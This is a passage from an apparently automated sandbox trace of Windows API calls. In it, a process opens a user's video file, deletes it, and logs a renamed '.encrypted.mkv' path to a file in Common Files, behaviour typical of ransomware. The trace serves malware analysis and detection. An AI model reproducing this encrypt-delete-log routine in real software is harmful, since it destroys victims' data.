hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.348] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.348] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.348] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.349] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.349] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0043.349] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.350] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\02dcezb-wigqkj.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0043.350] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.351] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.351] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.351] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.351] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0043.351] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.351] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.351] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.351] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.351] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.351] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.351] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.351] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.351] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0043.352] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.352] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.352] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.352] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.352] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.352] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.352] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.352] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv", lpFilePart=0x0) returned 0x4b [0043.352] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b738d40, ftCreationTime.dwHighDateTime=0x1d5c26c, ftLastAccessTime.dwLowDateTime=0xf00cb540, ftLastAccessTime.dwHighDateTime=0x1d5bef4, ftLastWriteTime.dwLowDateTime=0x198c11a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1667f, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="02DcEZB-wigQKJ.mkv", cAlternateFileName="02DCEZ~1.MKV")) returned 0x7c2240 [0043.352] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\02dcezb-wigqkj.mkv")) returned 1 [0043.354] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b738d40, ftCreationTime.dwHighDateTime=0x1d5c26c, ftLastAccessTime.dwLowDateTime=0xf00cb540, ftLastAccessTime.dwHighDateTime=0x1d5bef4, ftLastWriteTime.dwLowDateTime=0x198c11a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1667f, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="02DcEZB-wigQKJ.mkv", cAlternateFileName="02DCEZ~1.MKV")) returned 0 [0043.354] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.354] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.354] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0043.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0043.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.354] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.355] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0043.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.355] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0043.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.355] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0043.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0043.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.355] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0043.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.355] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.355] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.356] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.356] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0043.356] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.356] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.356] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0043.356] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x377a, lpOverlapped=0x0) returned 1 [0043.356] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0043.356] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x377a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.356] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.encrypted.mkv\r\n", cchWideChar=88, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 88 [0043.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x58) returned 0x794b90 [0043.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.encrypted.mkv\r\n", cchWideChar=88, lpMultiByteStr=0x794b90, cbMultiByte=88, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\02DcEZB-wigQKJ.encrypted.mkv\r\n", lpUsedDefaultChar=0x0) returned 88 [0043.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0043.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0043.356] WriteFile (in: hFile=0x128, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x57, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x57, lpOverlapped=0x0) returned 1 [0043.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0043.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.357] CloseHandle (hObject=0x128) returned 1 [0043.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0043.361] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0043.361] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0043.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.362] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0043.363] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.363] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0043.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.363] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa 